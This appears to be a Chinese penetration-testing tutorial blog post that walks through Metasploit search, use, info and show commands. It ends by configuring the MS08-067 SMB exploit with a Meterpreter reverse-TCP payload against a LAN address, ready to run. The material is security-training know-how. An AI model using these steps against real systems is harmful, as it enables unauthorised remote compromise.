网络空间安全之一个WH的超前沿全栈技术深入学习之路(13-2)白帽必经之路——如何用Metasploit 渗透到她的心才不会让我释怀

news2024/11/29 15:33:18

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 


专栏跑道二


➡️ 24 Network Security -LJS 

​ 

专栏跑道三


 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五


➡️RHCE-LJS[Linux高端骚操作实战篇]

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]


上节回顾

目录

欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

专栏跑道一

➡️网络空间安全——全栈前沿技术持续深入学习 

专栏跑道二

➡️ 24 Network Security -LJS 

专栏跑道三

 ➡️ MYSQL REDIS Advance operation

专栏跑道四

➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

专栏跑道五

➡️RHCE-LJS[Linux高端骚操作实战篇]​编辑​

专栏跑道六

➡️数据结构与算法[考研+实际工作应用+C程序设计]

专栏跑道七

➡️RHCSA-LJS[Linux初级及进阶骚技能]

上节回顾

4.MS模块命令 之search 搜索的使用方法

示例4:通过类型进行查找

示例5:联合查找

注意:

示例6:根据 CVE 搜索 exploit 相关模块

补充:

搜索参数可以组合使用,可以更精准的查询到对应的模块。

​编辑

5、模块相关的命令 use 的使用方法

查找出 ms08_067 漏洞模块

扩展:以下3种查找结果是一样,metasploit 支持模糊查找,不区分大小写

装载一个渗透攻击模块

6、模块相关的命令 info 的使用方法

方法 1:info 模块名称

方法 2:use 装载模块后直接使用 info

从bash交互式回显中,需要重点关注的内容是:

(1)、可用目标,就是查看可以攻击哪些操作系统

(2)、Basic options: 调用漏洞需要的相关参数

(3)、漏洞描述和执行过程:

方法 3:使用 show 命令查看模块的相关信息

查看模块的选项

查看可以攻击哪些操作系统

设置 RHOSTS 参数,指定攻击的目标机器

查看设置的值

特别注意:

4.MS模块命令 之search 搜索的使用方法

示例4:通过类型进行查找

  • 这里要使用到 type:命令。
  • type : 特定类型的模块(exploit, payload, auxiliary, encoder, evasion, post, or nop)
  • 要搜索 exploit 模块,那么就输入如下命令:

 

msf6 > search type:exploit

示例5:联合查找

  • 可以使用上面的参数自行搭配使用。
  • 如果要查找 mysql 的 exploit 相关漏洞。那么可以输入:
msf6 >  search name:mysql type:exploit

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/linux/mysql/mysql_yassl_getname        2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow
   1  exploit/linux/mysql/mysql_yassl_hello          2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow
   2  exploit/windows/mysql/mysql_yassl_hello        2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow
   3  exploit/multi/mysql/mysql_udf_payload          2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution
   4  exploit/windows/mysql/mysql_start_up           2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   5  exploit/windows/mysql/mysql_mof                2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution
   6  exploit/windows/mysql/scrutinizer_upload_exec  2012-07-27       excellent  Yes    Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential


Interact with a module by name or index. For example info 6, use 6 or use exploit/windows/mysql/scrutinizer_upload_exec                                                               

msf6 > 

注意:

  • MySQL yaSSL CertDecoder::GetName Buffer Overflow 的意思是:
  • mysql yassl certdecoder::getname 缓冲区溢

示例6:根据 CVE 搜索 exploit 相关模块

msf6 >  search cve:CVE-2017-8464 type:exploit     #查找:CVE-2017-8464 远程命令执行漏洞

Matching Modules
================

   #  Name                                              Disclosure Date  Rank   Check  Description
   -  ----                                              ---------------  ----   -----  -----------
   0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       great  No     LNK Code Execution Vulnerability
   1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       great  Yes    LNK Code Execution Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                 

msf6 > search cve:2018 name:linux   #查找 2018 年 linux 相关的漏洞模块

Matching Modules
================

   #  Name                                                       Disclosure Date  Rank   Check  Description
   -  ----                                                       ---------------  ----   -----  -----------
   0  exploit/linux/local/nested_namespace_idmap_limit_priv_esc  2018-11-15       great  Yes    Linux Nested User Namespace idmap Limit Local Privilege Escalation


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/nested_namespace_idmap_limit_priv_esc                                                   

msf6 > 

补充:
  • 搜索参数可以组合使用,可以更精准的查询到对应的模块。

5、模块相关的命令 use 的使用方法

  • use 使用参数。如你要使用到某个模块,就要使用到 use 命令
  • 语法:use 模块的名字

查找出 ms08_067 漏洞模块

msf6 >  search ms08_067
                                                                                               
Matching Modules                                                                               
================                                                                               
                                                                                               
   #  Name                                 Disclosure Date  Rank   Check  Description          
   -  ----                                 ---------------  ----   -----  -----------          
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption                                                    
                                                                                               
                                                                                               
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi                                                                                 
                                                                                               
msf6 >          

  • 扩展:以下3种查找结果是一样,metasploit 支持模糊查找,不区分大小写

装载一个渗透攻击模块

msf6 >  
msf6 > use exploit/windows/smb/ms08_067_netapi                                                                                                     
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > back 
msf6 > 

  • 可以看到使用 use 装载模块后我们的 bash 提示符会变成对应的模块信息。
  • 稍后我们使用这个模块进行攻击。

6、模块相关的命令 info 的使用方法

  • info :显示模块的相关信息。
  • 方法 1:info 模块名称

msf6 >  info exploit/windows/smb/ms08_067_netapi

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic Targeting
      1   Windows 2000 Universal
      2   Windows XP SP0/SP1 Universal
      3   Windows 2003 SP0 Universal
      4   Windows XP SP2 English (AlwaysOn NX)
      5   Windows XP SP2 English (NX)
      6   Windows XP SP3 English (AlwaysOn NX)
      7   Windows XP SP3 English (NX)
      8   Windows XP SP2 Arabic (NX)
      9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
      10  Windows XP SP2 Chinese - Simplified (NX)
      11  Windows XP SP2 Chinese - Traditional (NX)
      12  Windows XP SP2 Czech (NX)
      13  Windows XP SP2 Danish (NX)
      14  Windows XP SP2 German (NX)
      15  Windows XP SP2 Greek (NX)
      16  Windows XP SP2 Spanish (NX)
      17  Windows XP SP2 Finnish (NX)
      18  Windows XP SP2 French (NX)
      19  Windows XP SP2 Hebrew (NX)
      20  Windows XP SP2 Hungarian (NX)
      21  Windows XP SP2 Italian (NX)
      22  Windows XP SP2 Japanese (NX)
      23  Windows XP SP2 Korean (NX)
      24  Windows XP SP2 Dutch (NX)
      25  Windows XP SP2 Norwegian (NX)
      26  Windows XP SP2 Polish (NX)
      27  Windows XP SP2 Portuguese - Brazilian (NX)
      28  Windows XP SP2 Portuguese (NX)
      29  Windows XP SP2 Russian (NX)
      30  Windows XP SP2 Swedish (NX)
      31  Windows XP SP2 Turkish (NX)
      32  Windows XP SP3 Arabic (NX)
      33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
      34  Windows XP SP3 Chinese - Simplified (NX)
      35  Windows XP SP3 Chinese - Traditional (NX)
      36  Windows XP SP3 Czech (NX)
      37  Windows XP SP3 Danish (NX)
      38  Windows XP SP3 German (NX)
      39  Windows XP SP3 Greek (NX)
      40  Windows XP SP3 Spanish (NX)
      41  Windows XP SP3 Finnish (NX)
      42  Windows XP SP3 French (NX)
      43  Windows XP SP3 Hebrew (NX)
      44  Windows XP SP3 Hungarian (NX)
      45  Windows XP SP3 Italian (NX)
      46  Windows XP SP3 Japanese (NX)
      47  Windows XP SP3 Korean (NX)
      48  Windows XP SP3 Dutch (NX)
      49  Windows XP SP3 Norwegian (NX)
      50  Windows XP SP3 Polish (NX)
      51  Windows XP SP3 Portuguese - Brazilian (NX)
      52  Windows XP SP3 Portuguese (NX)
      53  Windows XP SP3 Russian (NX)
      54  Windows XP SP3 Swedish (NX)
      55  Windows XP SP3 Turkish (NX)
      56  Windows 2003 SP1 English (NO NX)
      57  Windows 2003 SP1 English (NX)
      58  Windows 2003 SP1 Japanese (NO NX)
      59  Windows 2003 SP1 Spanish (NO NX)
      60  Windows 2003 SP1 Spanish (NX)
      61  Windows 2003 SP1 French (NO NX)
      62  Windows 2003 SP1 French (NX)
      63  Windows 2003 SP2 English (NO NX)
      64  Windows 2003 SP2 English (NX)
      65  Windows 2003 SP2 German (NO NX)
      66  Windows 2003 SP2 German (NX)
      67  Windows 2003 SP2 Portuguese (NX)
      68  Windows 2003 SP2 Portuguese - Brazilian (NX)
      69  Windows 2003 SP2 Spanish (NO NX)
      70  Windows 2003 SP2 Spanish (NX)
      71  Windows 2003 SP2 Japanese (NO NX)
      72  Windows 2003 SP2 French (NO NX)
      73  Windows 2003 SP2 French (NX)
      74  Windows 2003 SP2 Chinese - Simplified (NX)
      75  Windows 2003 SP2 Czech (NX)
      76  Windows 2003 SP2 Dutch (NX)
      77  Windows 2003 SP2 Hungarian (NX)
      78  Windows 2003 SP2 Italian (NX)
      79  Windows 2003 SP2 Russian (NX)
      80  Windows 2003 SP2 Swedish (NX)
      81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization code of
  NetAPI32.dll through the Server Service. This module is capable of bypassing
  NX on some operating systems and service packs. The correct target must be
  used to prevent the Server Service (along with a dozen others in the same
  process) from crashing. Windows XP targets seem to handle multiple successful
  exploitation events, but 2003 targets will often crash or hang on subsequent
  attempts. This is just the first version of this module, full support for
  NX bypass on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/


View the full module info with the info -d command.

msf6 > 
                                                                                                                                                                                                                                                                                    
                                                                                

方法 2:use 装载模块后直接使用 info

msf6 >  use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/meterpreter/reverse_tcp                                                                                                
msf6 exploit(windows/smb/ms08_067_netapi) > 
                                                    

从bash交互式回显中,需要重点关注的内容是

(1)、可用目标,就是查看可以攻击哪些操作系统

(2)、Basic options: 调用漏洞需要的相关参数

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

(3)、漏洞描述和执行过程:
Description:
  This module exploits a parsing flaw in the path canonicalization code of
  NetAPI32.dll through the Server Service. This module is capable of bypassing
  NX on some operating systems and service packs. The correct target must be
  used to prevent the Server Service (along with a dozen others in the same
  process) from crashing. Windows XP targets seem to handle multiple successful
  exploitation events, but 2003 targets will often crash or hang on subsequent
  attempts. This is just the first version of this module, full support for
  NX bypass on 2003, along with other platforms, is still in development.

(4)、参考文档

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  https://www.rapid7.com/db/vulnerabilities/dcerpc-ms-netapi-netpathcanonicalize-dos/

方法 3:使用 show 命令查看模块的相关信息

查看模块的选项

msf6 exploit(windows/smb/ms08_067_netapi) > show options 
                                                                                                                                                            
Module options (exploit/windows/smb/ms08_067_netapi):                                                                                                       
                                                                                                                                                            
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.79.135   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting



View the full module info with the info, or info -d command.

查看可以攻击哪些操作系统

msf6 exploit(windows/smb/ms08_067_netapi) > show targets 

Exploit targets:
=================

    Id  Name
    --  ----
=>  0   Automatic Targeting
    1   Windows 2000 Universal
    2   Windows XP SP0/SP1 Universal
    3   Windows 2003 SP0 Universal
    4   Windows XP SP2 English (AlwaysOn NX)
    5   Windows XP SP2 English (NX)
    6   Windows XP SP3 English (AlwaysOn NX)
    7   Windows XP SP3 English (NX)
    8   Windows XP SP2 Arabic (NX)
    9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
    10  Windows XP SP2 Chinese - Simplified (NX)
    11  Windows XP SP2 Chinese - Traditional (NX)
    12  Windows XP SP2 Czech (NX)
    13  Windows XP SP2 Danish (NX)
    14  Windows XP SP2 German (NX)
    15  Windows XP SP2 Greek (NX)


7.设置 RHOSTS 参数,指定攻击的目标机器

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.54
RHOSTS => 192.168.1.54


查看设置的值

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.1.54     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

  • 配置好了之后我们输入 exploit 或 run 就可以执行该模块。

特别注意:

  • 使用 back 即可退出装载的模块
  • 不要使用 exit,exit 会直接退出 Metasploit 程序


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2249836.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

机器学习6_支持向量机_算法流程

最大化&#xff1a; 限制条件&#xff1a; &#xff08;1&#xff09; &#xff08;2&#xff09; 如何求解这个对偶问题&#xff0c;同时基于对偶问题给出支持向量机算法的统一流程。 (核函数) 只要知道核函数&#xff0c;就可以求个这个最优化的对偶问题。 求解了这个对偶…

DM8 Docker环境部署

1 环境说明 类别 版本 介质 操作系统 CentOS-7-x86_64-DVD-2207-02.iso docker-27.3.1.tgz Dm8 Docker DM8开发版 dm8_20241119_x86_rh6_64_rq_ent_8.1.2.84.tar 备注&#xff1a; 下载docker源码包 下载地址&#xff1a; https://download.docker.com/linux/static/stable/x…

DevOps工程技术价值流:Jenkins驱动的持续集成与交付实践

一、Jenkins系统概述 Jenkins&#xff1a;开源CI/CD引擎的佼佼者 Jenkins&#xff0c;作为一款基于Java的开源持续集成&#xff08;CI&#xff09;与持续交付&#xff08;CD&#xff09;系统&#xff0c;凭借其强大的插件生态系统&#xff0c;成为DevOps实践中不可或缺的核心…

apache实现绑定多个虚拟主机访问服务

1个网卡绑定多个ip的命令 ip address add 192.168.45.140/24 dev ens33 ip address add 192.168.45.141/24 dev ens33 在linux服务器上&#xff0c;添加多个站点资料&#xff0c;递归创建三个文件目录 分别在三个文件夹下&#xff0c;建立测试页面 修改apache的配置文件http.…

【css实现收货地址下边的平行四边形彩色线条】

废话不多说&#xff0c;直接上代码&#xff1a; <div class"address-block" ><!-- 其他内容... --><div class"checked-ar"></div> </div> .address-block{height:120px;position: relative;overflow: hidden;width: 500p…

启动SpringBoot

前言&#xff1a;大家好我是小帅&#xff0c;今天我们来学习SpringBoot 文章目录 1. 环境准备2. Maven2.1 什么是Maven2.2 创建⼀个Maven项⽬2.3 依赖管理2.3.1 依赖配置2.3.2 依赖传递2.3.4 依赖排除2.3.5 Maven Help插件&#xff08;plugin&#xff09; 2.4 Maven 仓库2.6 中…

ERROR CoarseGrainedExecutorBackend: RECEIVED SIGNAL TERM

如果你的spark on yarn任务正常运行&#xff0c;能得到结果&#xff0c;但是日志中出现了如下的报错 看见这个报错不要慌张&#xff0c;这个是你开启了动态伸缩容器&#xff0c;且当这个容器触发了空闲关闭的阈值&#xff0c;默认是60秒&#xff0c;这时候该容器会被删除掉&a…

SpringBoot实战(三十二)集成 ofdrw,实现 PDF 和 OFD 的转换、SM2 签署OFD

目录 一、OFD 简介1.1 什么是 OFD&#xff1f;1.2 什么是 版式文档&#xff1f;1.3 为什么要用 OFD 而不是PDF&#xff1f; 二、ofdrw 简介2.1 定义2.2 Maven 依赖2.3 ofdrw 的 13 个模块 三、PDF/文本/图片 转 OFD&#xff08;ofdrw-conterver&#xff09;3.1 介绍&#xff1a…

QT6学习第四天 感受QT的文件编译

QT6学习第四天 感受QT的文件编译 使用纯代码编写程序新建工程 使用其他编辑器纯代码编写程序并在命令行运行使用 .ui 表单文件生成界面使用自定义 C 窗口类使用现成的QT Designer界面类 使用纯代码编写程序 我们知道QT Creator中可以用拖拽的方式在 .ui 文件上布局&#xff0c…

C++:用红黑树封装map与set-2

文章目录 前言一、红黑树封装map与set中const迭代器1. 框架的搭建2. set实现const迭代器3. map实现const迭代器 二、operator[ ]1. operator[ ]要达成的样子2. insert的改变 三. 解决insert里set中的问题四. 解决map中的operator[ ]总结用红黑树封装map与set代码 前言 前面我们…

微信小程序下拉刷新与上拉触底的全面教程

微信小程序下拉刷新与上拉触底的全面教程 引言 在微信小程序的开发中,用户体验至关重要。下拉刷新和上拉触底是提高用户交互体验的重要功能,能够让用户轻松获取最新数据和内容。本文将详细介绍这两个功能的实现方式,结合实际案例、代码示例和图片展示,帮助开发者轻松掌握…

【博主推荐】C#中winfrom开发常用技术点收集

文章目录 前言1.打开文件夹并选中文件2.窗体之间传参3.异步调用&#xff1a;让数据处理不影响页面操作4.创建一个多文档界面(MDI) 应用程序5.在WinForms中使用数据绑定6.在WinForms中后台使用控件的事件处理7.在WinForms中窗体跳转的几种方式8.后台处理方法中&#xff0c;调用窗…

第四十二篇 EfficientNet:重新思考卷积神经网络的模型缩放

文章目录 摘要1、简介2、相关工作3、复合模型缩放3.1、 问题公式化3.2、扩展维度3.3、复合比例 4、EfficientNet架构5、实验5.1、扩展MobileNets和ResNets5.2、EfficientNet的ImageNet结果5.3、EfficientNet的迁移学习结果 6、讨论7、结论 摘要 卷积神经网络(ConvNets)通常在固…

【Android】MMKV—高性能轻量化存储组件

【Android】MMKV—高性能轻量化存储组件 本文参考以及学习文档&#xff1a; Android存储&#xff1a;轻松掌握MMKV通过学习本文&#xff0c;轻松掌握腾讯开发的 MMKV 组件&#xff0c;尽早在项目中替换掉SharedPr - 掘金 MMKV——Android上的使用(替换SP存储)MMKV 是基于 mmap …

python+django自动化平台(一键执行sql) 前端vue-element展示

一、开发环境搭建和配置 pip install mysql-connector-pythonpip install PyMySQL二、django模块目录 dbOperations ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-313.pyc │ ├── admin.cpython-313.pyc │ ├── apps.cpython-313.pyc │ …

arm Rk1126 编译Qt工程报错: Could not find qmake spec

首先修改qmake.conf文件&#xff0c;配置好正确的交叉编译工具&#xff1a; 然后执行编译&#xff1a; /opt/Rv1126/Rv1126-盒子代码/rv1126-qt5-sdk/bin/qmake untitled.pro 报错。 原因&#xff1a;中文路径。修改路径为英文路径即可

[保姆式教程]使用labelimg2软件标注定向目标检测数据和格式转换

定向目标检测是一种在图像或视频中识别和定位对象的同时&#xff0c;还估计它们方向的技术。这种技术特别适用于处理有一定旋转或方向变化的对象&#xff0c;例如汽车、飞机或文本。定向目标检测器的输出是一组旋转的边界框&#xff0c;这些框精确地包围了图像中的对象&#xf…

C语言刷题笔记3(7)

7.1 数组处理斐波那契数列 题目描述:用数组来处理Fibonacci数列并输出。 输入:一个不超过40且大于2的整数n&#xff0c;表示需要处理并输出的Fibonacci数个数。 输出:输出前n个Fibonacci数&#xff0c;每行输出5个值&#xff0c;按每12位向右对齐的方式输出。请注意不要在第…

PHP 去掉特殊不可见字符 “\u200e“

描述 最近在排查网站业务时&#xff0c;发现有数据匹配失败的情况 肉眼上完全看不出问题所在 当把字符串 【M24308/23-14F‎】复制出来发现 末尾有个不可见的字符 使用删除键或左右移动时才会发现 最后测试通过 var_dump 打印 发现这个"空字符"占了三个长度 &#xf…

构建 LLM (大型语言模型)应用程序——从入门到精通(第七部分:开源 RAG)

通过检索增强生成 (RAG) 应用程序的视角学习大型语言模型 (LLM)。 本系列博文 简介数据准备句子转换器矢量数据库搜索与检索大语言模型开源 RAG&#xff08;本帖&#xff09;评估服务LLM高级 RAG 1. 简介 我们之前的博客文章广泛探讨了大型语言模型 (LLM)&#xff0c;涵盖了其…